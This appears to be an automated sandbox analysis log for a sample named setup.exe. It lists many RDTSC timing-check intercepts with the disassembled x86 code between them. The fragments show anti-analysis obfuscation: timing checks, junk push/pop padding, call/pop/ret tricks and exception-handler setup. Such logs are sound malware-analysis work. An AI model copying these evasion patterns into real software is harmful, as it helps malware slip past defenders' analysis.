Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC985 second address: 4AC9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F47CD346623h 0x0000000a jnp 00007F47CD34661Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A9C7E second address: 4A9CDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361210h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F47CD36120Fh 0x0000000f nop 0x00000010 sub dword ptr [ebp+122D18C1h], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov edi, dword ptr [ebp+122D35DAh] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push edi 0x0000002b cmc 0x0000002c pop edi 0x0000002d mov eax, dword ptr [ebp+122D08FDh] 0x00000033 mov edi, dword ptr [ebp+122D2F2Dh] 0x00000039 push FFFFFFFFh 0x0000003b mov edi, dword ptr [ebp+1247F428h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AAAE3 second address: 4AAAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A8DFF second address: 4A8E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC9A4 second address: 4AC9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A9CDA second address: 4A9CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AAAEB second address: 4AAB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47CD34661Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A8E05 second address: 4A8E14 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC9AE second address: 4AC9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD00E second address: 4AD012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD012 second address: 4AD02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47CD34661Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4ADFA3 second address: 4ADFAD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F47CD36120Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD286 second address: 4AD29A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD346620h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD29A second address: 4AD29E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF177 second address: 4AF17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF17D second address: 4AF1F6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F47CD361206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+12460A19h] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov edi, dword ptr [ebp+122D2FD2h] 0x00000022 pushad 0x00000023 jng 00007F47CD361206h 0x00000029 mov dword ptr [ebp+1248516Ah], eax 0x0000002f popad 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 call 00007F47CD361213h 0x0000003c mov ebx, esi 0x0000003e pop edi 0x0000003f add ebx, dword ptr [ebp+122D3491h] 0x00000045 mov eax, dword ptr [ebp+122D0811h] 0x0000004b add edi, dword ptr [ebp+12485242h] 0x00000051 mov bl, 18h 0x00000053 push FFFFFFFFh 0x00000055 mov bl, ah 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F47CD361211h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF1F6 second address: 4AF200 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47CD34661Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B0080 second address: 4B0097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47CD361212h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B1E7D second address: 4B1EA7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F47CD346629h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F47CD34661Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B1EA7 second address: 4B1EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B2F00 second address: 4B2F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F47CD346616h 0x0000000a popad 0x0000000b nop 0x0000000c xor dword ptr [ebp+1245CB3Ch], edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F47CD346618h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 or edi, dword ptr [ebp+1245790Ch] 0x00000036 cld 0x00000037 xchg eax, esi 0x00000038 push esi 0x00000039 jbe 00007F47CD34661Ch 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B2F48 second address: 4B2F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 js 00007F47CD361210h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B219B second address: 4B21B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD346627h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B6655 second address: 4B665B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B845F second address: 4B8469 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD346616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B8469 second address: 4B846E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B761E second address: 4B7624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B7624 second address: 4B764D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F47CD361215h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F47CD361206h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B9419 second address: 4B9425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B8635 second address: 4B863E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B9580 second address: 4B965B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F47CD34662Dh 0x0000000c popad 0x0000000d nop 0x0000000e or dword ptr [ebp+122D1ABAh], ebx 0x00000014 mov dword ptr [ebp+1246EB6Eh], eax 0x0000001a push dword ptr fs:[00000000h] 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F47CD346618h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b call 00007F47CD34661Eh 0x00000040 jmp 00007F47CD346625h 0x00000045 pop ebx 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d mov dword ptr [ebp+1245B298h], esi 0x00000053 mov eax, dword ptr [ebp+122D0879h] 0x00000059 jl 00007F47CD34661Ch 0x0000005f and ebx, 3AF22282h 0x00000065 pushad 0x00000066 call 00007F47CD346620h 0x0000006b mov edi, edx 0x0000006d pop esi 0x0000006e popad 0x0000006f push FFFFFFFFh 0x00000071 mov bh, 23h 0x00000073 pushad 0x00000074 mov eax, dword ptr [ebp+122D2E81h] 0x0000007a call 00007F47CD34661Fh 0x0000007f and esi, dword ptr [ebp+122D1C99h] 0x00000085 pop edx 0x00000086 popad 0x00000087 nop 0x00000088 push eax 0x00000089 push edx 0x0000008a push ecx 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B965B second address: 4B9660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B9660 second address: 4B9666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B9666 second address: 4B967E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F47CD36120Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B967E second address: 4B968F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD34661Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B968F second address: 4B9693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4BA61D second address: 4BA621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4BA621 second address: 4BA6AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F47CD361210h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F47CD361208h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr [ebp+1246ED58h], ebx 0x0000002e mov bx, E2EBh 0x00000032 push dword ptr fs:[00000000h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, dword ptr [ebp+122D2CFDh] 0x00000046 mov eax, dword ptr [ebp+122D067Dh] 0x0000004c mov dword ptr [ebp+122D1BD6h], eax 0x00000052 push FFFFFFFFh 0x00000054 call 00007F47CD361211h 0x00000059 add bx, 9DCCh 0x0000005e pop edi 0x0000005f mov ebx, dword ptr [ebp+122D2DF5h] 0x00000065 push eax 0x00000066 push esi 0x00000067 push eax 0x00000068 push edx 0x00000069 push edi 0x0000006a pop edi 0x0000006b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4BA6AD second address: 4BA6B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4C794A second address: 4C7950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4CB067 second address: 4CB081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F47CD346616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F47CD34661Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4CB081 second address: 4CB098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD361213h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4CB098 second address: 4CB09C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4CF143 second address: 4CF147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4CF147 second address: 4CF15B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346620h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4CF15B second address: 4CF169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F47CD36120Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4CFBBB second address: 4CFBBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4CFECC second address: 4CFED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4CFED0 second address: 4CFEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4CFEDC second address: 4CFEE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4CFEE0 second address: 4CFEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D0050 second address: 4D0055 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D0055 second address: 4D0063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F47CD346616h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D0063 second address: 4D00B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F47CD361211h 0x00000011 pop ecx 0x00000012 jg 00007F47CD361231h 0x00000018 jmp 00007F47CD361216h 0x0000001d jmp 00007F47CD361215h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D00B2 second address: 4D00BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F47CD346616h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D0367 second address: 4D0376 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F47CD361206h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D0376 second address: 4D039B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47CD346621h 0x0000000c jmp 00007F47CD34661Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 464BB2 second address: 464BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 464BB6 second address: 464BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F47CD34662Dh 0x0000000f jmp 00007F47CD346621h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 464BDF second address: 464BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 464BE3 second address: 464BF7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD34661Ch 0x00000008 jnc 00007F47CD346616h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D386D second address: 4D3887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F47CD361211h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D3887 second address: 4D3893 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D3893 second address: 4D38A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4D38A4 second address: 4D38B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47CD34661Bh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49F36D second address: 49F373 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49F821 second address: 49F827 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49F827 second address: 49F870 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47CD36120Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 65211E51h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F47CD361208h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D2C18h], esi 0x00000031 push 329B9F1Bh 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push edi 0x0000003b pop edi 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49F870 second address: 49F881 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49F881 second address: 49F887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49F887 second address: 49F88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49FCB2 second address: 49FD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47CD361218h 0x0000000c pop edx 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F47CD361208h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov cx, 5F37h 0x0000002c jmp 00007F47CD36120Bh 0x00000031 jmp 00007F47CD361218h 0x00000036 push 00000004h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F47CD361208h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 nop 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushad 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49FD48 second address: 49FD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49FD4D second address: 49FD5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49FD5B second address: 49FD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A015A second address: 4A017C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A017C second address: 4A0180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0180 second address: 4A019B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A019B second address: 4A01CB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47CD346624h 0x00000008 jmp 00007F47CD34661Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push ebx 0x00000011 or edx, dword ptr [ebp+122D2E85h] 0x00000017 pop edi 0x00000018 push 0000001Eh 0x0000001a or dword ptr [ebp+122D1A21h], edx 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push edi 0x00000026 pop edi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A01CB second address: 4A01CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A01CF second address: 4A01D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A01D5 second address: 4A01DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0304 second address: 4A0319 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47CD34661Bh 0x0000000f rdtsc
